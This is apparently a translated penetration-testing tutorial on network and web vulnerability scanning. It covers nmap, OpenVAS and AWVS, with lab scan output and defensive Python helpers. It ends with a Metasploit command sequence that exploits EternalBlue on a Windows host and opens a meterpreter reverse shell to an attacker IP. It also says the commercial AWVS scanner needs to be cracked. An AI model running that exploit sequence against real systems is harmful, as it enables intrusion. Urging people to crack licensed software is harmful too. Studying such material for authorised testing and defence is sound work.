Scanning techniques
Discover which assets exist in the target environment: networked devices, hosts, servers, and services of every kind. Network vulnerability scanning gives a comprehensive picture of the security vulnerabilities present on the target servers. Commonly used scanners include Nessus, NeXpose and OpenVAS.
- Vulnerability scanning principle
Network vulnerability scanning means using automated tools to find security vulnerabilities in the various hosts and devices on a network. These automated tools are usually called vulnerability scanners. Vulnerability scanning is generally divided into two kinds: black-box scanning and white-box scanning.
- Black-box scanning
Black-box scanning usually identifies the type and version of a service remotely and judges from that whether the service is vulnerable. Some of the newest scanners apply more advanced techniques, such as simulated penetration attacks.
- White-box scanning
White-box scanning is vulnerability scanning performed with operating privileges on the host. For example, Microsoft's patch update program periodically scans your operating system for security vulnerabilities and pushes the corresponding patches to you. White-box results are more accurate, but in general the vulnerabilities it identifies should not be taken as the final data of an external penetration test, because firewalls and assorted protective software may well make them unexploitable from outside. Besides, in most cases you will not have the opportunity to obtain usernames and passwords.

A vulnerability scanner normally ships with a signature database used to identify host vulnerabilities, and that database is updated periodically. During a scan, the scripts in the signature database are matched against the target system's responses; a match indicates that a particular vulnerability exists. While identifying vulnerabilities the scanner sends a large number of packets to the target, which can sometimes cause the target system to deny service or become congested by the scan traffic, and the scanning activity will also be noticed by the other side's intrusion detection equipment.

Scanner results usually contain many false positives (vulnerabilities reported that do not actually exist) and false negatives (vulnerabilities that exist but are not reported). The results therefore need manual analysis to determine which vulnerabilities are real; this process is called vulnerability verification. It is an indispensable step of a penetration test: only after the existence of a vulnerability has been confirmed can it be exploited in depth. In penetration testing work, a scanner may be used with the client's approval, but be careful to avoid risk and keep any impact on the running system to a minimum.
nmap
Cross-platform. When no port is specified, it scans ports 1~1000 by default.
| Option | Result |
|---|---|
| -sP/-sn | ping scan (host discovery) |
| -p 80 | port 80 only |
| -p 1-80 | ports 1-80 |
| -p 80,3389 | ports 80 and 3389 |
| -p- | all ports 1-65535 |
| -sT | TCP connect (full three-way handshake) scan |
| -sS | SYN half-open scan |
| -sN | Null scan |
| -sX | Xmas scan |
| -sF | FIN scan |
| -sV | service version detection (shows detailed service versions) |
| -O | enable operating system detection |
| -A | aggressive scan (OS detection, version detection, script scanning and traceroute) |
| -oN/-oX | save scan results as txt/xml |
| -T0~-T5 | timing template |
```
root@kali:~# nmap 10.0.0.0/24 -sP
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:36 CST
Nmap scan report for 10.0.0.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.000098s latency).
MAC Address: 00:50:56:EF:31:20 (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00020s latency).
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap scan report for 10.0.0.254
Host is up (0.00015s latency).
MAC Address: 00:0C:29:E5:20:37 (VMware)
Nmap scan report for 10.0.0.221
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds
root@kali:~# nmap 10.0.0.7 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:37 CST
Nmap scan report for 10.0.0.7
Host is up (0.0011s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
9200/tcp open wap-wsp
9300/tcp open vrace
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
root@kali:~# nmap 10.0.0.0/24 -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Nmap scan report for 10.0.0.1
Host is up (0.00027s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.00011s latency).
PORT STATE SERVICE
80/tcp closed http
MAC Address: 00:50:56:EF:31:20 (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00024s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap scan report for 10.0.0.254
Host is up (0.000073s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:E5:20:37 (VMware)
Nmap scan report for 10.0.0.221
Host is up (0.000052s latency).
PORT STATE SERVICE
80/tcp closed http
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.47 seconds
```
```
root@kali:~# nmap 10.0.0.7 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:07 remaining)
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:09 remaining)
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:10 remaining)
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:40 (0:00:26 remaining)
Nmap scan report for 10.0.0.7
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 5f:4b:28:0f:20:9f:b7:dc:a7:25:9a:fc:d7:31:a0:63 (RSA)
| 256 e4:a3:00:75:0d:a3:39:a0:98:38:fe:5b:a8:62:04:f8 (ECDSA)
|_ 256 f5:48:1e:be:c8:d6:f6:a1:76:9e:a7:24:42:f7:dc:80 (ED25519)
80/tcp open http nginx 1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: \xE7\xA5\x9E\xE5\x87\xBA\xE9\xAC\xBC\xE6\xB2\xA1\xE7\x9A\x84Enderman - long long ago,I was born.
3306/tcp open mysql MySQL 5.7.28
| mysql-info:
| Protocol: 10
| Version: 5.7.28
| Thread ID: 1268
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, LongPassword, InteractiveClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: &fbK?\x08\Q\x1AT%]6"?2\x0Cxy8
|_ Auth Plugin Name: 79
9200/tcp open wap-wsp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| content-type: application/json; charset=UTF-8
| content-length: 492
| "name" : "node-1",
| "cluster_name" : "elasticsearch",
| "cluster_uuid" : "RpKAqucdQR6DbP8QChZ6CA",
| "version" : {
| "number" : "6.7.0",
| "build_flavor" : "default",
| "build_type" : "rpm",
| "build_hash" : "8453f77",
| "build_date" : "2019-03-21T15:32:29.844721Z",
| "build_snapshot" : false,
| "lucene_version" : "7.7.0",
| "minimum_wire_compatibility_version" : "5.6.0",
| "minimum_index_compatibility_version" : "5.0.0"
| "tagline" : "You Know, for Search"
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: DELETE,GET,HEAD
| content-type: text/plain; charset=UTF-8
| content-length: 0
| Help, SSLSessionReq:
| HTTP/1.0 400 Bad Request
| content-type: application/json; charset=UTF-8
| content-length: 203
| {"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"}],"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"},"status":400}
| RTSPRequest:
| HTTP/1.1 200 OK
| Allow: DELETE,GET,HEAD
| content-type: text/plain; charset=UTF-8
|_ content-length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
```
```
MAC Address: 00:0C:29:19:02:C3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.23 ms 10.0.0.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.01 seconds
```
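As an added example (not code from the original notes), the following Python reads the XML that `-oX` writes, flattens it into one record per port, and turns it into the manual verification queue that the section on scanning principles says every scanner result needs. The XML and the list of services to review are constructed assumptions modelled on the 10.0.0.7 scan above.

```python
import xml.etree.ElementTree as ET

# Constructed -oX output modelled on the 10.0.0.7 scan shown above; not a file from the page.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" version="7.70">
<host><status state="up"/><address addr="10.0.0.7" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/>
 <service name="ssh" product="OpenSSH" version="7.4" method="probed"/></port>
<port protocol="tcp" portid="80"><state state="open"/>
 <service name="http" product="nginx" version="1.18.0" method="probed"/></port>
<port protocol="tcp" portid="3306"><state state="open"/>
 <service name="mysql" product="MySQL" version="5.7.28" method="probed"/></port>
<port protocol="tcp" portid="9200"><state state="open"/>
 <service name="wap-wsp" method="table"/></port>
</ports></host></nmaprun>"""
# Assumed review policy: services that rarely belong on an interface a scanner can reach.
REVIEW_SERVICES = {"mysql", "ms-sql-s", "postgresql", "redis", "mongodb"}

def parse_nmap_xml(xml_text):
    """Flatten an nmap XML report into one dict per port."""
    rows = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.findall("ports/port"):
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            rows.append({
                "ip": ip,
                "port": int(port.get("portid")),
                "state": port.find("state").get("state"),
                "service": attrs.get("name", ""),
                "product": attrs.get("product", ""),
                "version": attrs.get("version", ""),
                # nmap sets method="table" for a guess from the port number, "probed" for a -sV banner match.
                "method": attrs.get("method", ""),
            })
    return rows

def triage(rows):
    """Turn raw scanner output into a verification queue of (ip, port, reason) tuples."""
    queue = []
    for r in rows:
        if r["state"] != "open":
            continue
        if r["service"] in REVIEW_SERVICES:
            queue.append((r["ip"], r["port"], "database service exposed; verify access controls"))
        if r["method"] != "probed" or not r["product"]:
            queue.append((r["ip"], r["port"], "service not fingerprinted; confirm banner manually"))
    return queue
```

Run against a real report with `triage(parse_nmap_xml(open("scan.xml").read()))`; the "wap-wsp?" guess on 9200 in the session above is exactly the kind of entry that lands in the queue.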
- -sS: SYN half-open scan
- -sT: TCP connect (full three-way handshake) scan
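The option table above lists SYN, Null, Xmas and FIN scans, and the principles section notes that scanning is visible to the target's intrusion detection. As an added example from the defender's side (not from the original notes), this Python classifies the TCP flag byte of packets that belong to no established connection into those probe types and reports sources that touch many distinct ports. The packet tuple format, the sample traffic and the thresholds are constructed assumptions.

```python
from collections import defaultdict

# TCP flag bits as they appear in the flags byte of the TCP header.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

def classify_probe(flags):
    """Map the flag byte of a packet that opens no known connection to the nmap scan it resembles."""
    probe = flags & (FIN | SYN | RST | PSH | ACK | URG)
    if probe == 0:
        return "null"   # -sN: no flags; per RFC 793 a closed port answers RST, an open one stays silent
    if probe == FIN:
        return "fin"    # -sF: lone FIN, same open/closed logic as the Null scan
    if probe == FIN | PSH | URG:
        return "xmas"   # -sX: FIN+PSH+URG, "lit up like a Christmas tree"
    if probe == SYN:
        return "syn"    # -sS half-open or the first packet of an -sT connect; also every normal client
    return None         # ACK/RST traffic belongs to existing sessions and is not a probe type covered here

# Assumed thresholds: a lone SYN is normal traffic, a lone Null/FIN/Xmas packet almost never is.
THRESHOLDS = {"syn": 10, "null": 2, "fin": 2, "xmas": 2}

def detect_scanners(packets, thresholds=THRESHOLDS):
    """packets: iterable of (src_ip, dst_ip, dst_port, flags) for packets with no matching
    established connection. Returns sorted [(src_ip, probe_type, distinct_targets)] over threshold."""
    seen = defaultdict(set)  # (src, probe type) -> set of (dst, port)
    for src, dst, dport, flags in packets:
        kind = classify_probe(flags)
        if kind is not None:
            seen[(src, kind)].add((dst, dport))
    alerts = []
    for (src, kind), targets in seen.items():
        if len(targets) >= thresholds[kind]:
            alerts.append((src, kind, len(targets)))
    return sorted(alerts)

# Constructed sample: a port sweep from 10.0.0.221 (like the `nmap 10.0.0.7 -p-` run above),
# an Xmas scan from 10.0.0.99, and one ordinary web client on 10.0.0.2.
SAMPLE_PACKETS = (
    [("10.0.0.221", "10.0.0.7", p, SYN) for p in range(20, 35)]
    + [("10.0.0.99", "10.0.0.7", p, FIN | PSH | URG) for p in (22, 80, 443, 3306)]
    + [("10.0.0.2", "10.0.0.7", 80, SYN)]
)
```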
OpenVAS
OpenVAS installation
It is recommended to download the ISO image from the official site and install from it. Image download address:
- Create a new virtual machine
  - The download is a split archive; after downloading, rename each part to its proper name and then extract them to obtain the ISO image:
    - gsm-ce-6.0.3.part1.rar
    - gsm-ce-6.0.3.part2.rar
    - gsm-ce-6.0.3.part3.rar
    - gsm-ce-6.0.3.part4.rar
    - gsm-ce-6.0.3.part5.rar
  - OS: Linux
  - Version: Other Linux 64-bit
  - Memory: 4 GB
  - Disk: 20 GB
  - CPUs: 2
  - Installation image: gsm-ce-6.0.3.iso
- Boot the virtual machine and run the installer
- Wait about 3 minutes
- Then enter the password to confirm
- Log in
- The About tab shows the appliance's current IP address
OpenVAS usage
- Create a new scan target
- Create a new scan task
- Start the scan
Web vulnerability scanning
With the growth of the Internet and of cloud computing, governments, banks, enterprises and organisations of every kind now have their own portal websites. Web applications keep multiplying, and at the same time the cost and difficulty of attacking them are comparatively low, so they have become a primary target of attackers. Whatever the attacker's motive, the challenges facing web applications are considerable, and discovering web application security vulnerabilities promptly, fixing them, and reducing or eliminating web security risk has become an important topic for the security industry.

A small web application has tens or hundreds of pages; a large one has thousands or tens of thousands. Checking the security of every page by hand is obviously prohibitively expensive, so we need automated tools to help auditors find web security vulnerabilities. These automated tools are web vulnerability scanners. There are many on the market; IBM's AppScan and the commercial scanner AWVS are among the best.
- Web vulnerability scanning principle
A web vulnerability scan is roughly divided into the following steps:
- Crawl the site's directories
- Scan with vulnerability scripts
- Save the scan results
The scanner's installation just requires clicking Next; once it finishes, it still needs to be cracked.
Create a scan target
- The username and password are both test
Analysing the scan results
- Each vulnerability entry can be expanded in turn to show the affected page and the parameter that causes the vulnerability. The right-hand sidebar shows the vulnerability's details, including its description and the test payload.
Saving the scan report
- The scan results can be saved; the saved file has the extension [.wvs]. If a virtual printer is installed, the results can also be saved as a PDF for easy circulation.
Reproducing the EternalBlue vulnerability
- Tool: msfconsole (Metasploit Framework, msf)
```
msfconsole
search MS17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
# target (victim) machine IP
set RHOST 10.0.0.5
# local (attacker) machine IP
set LHOST 10.0.0.221
exploit
```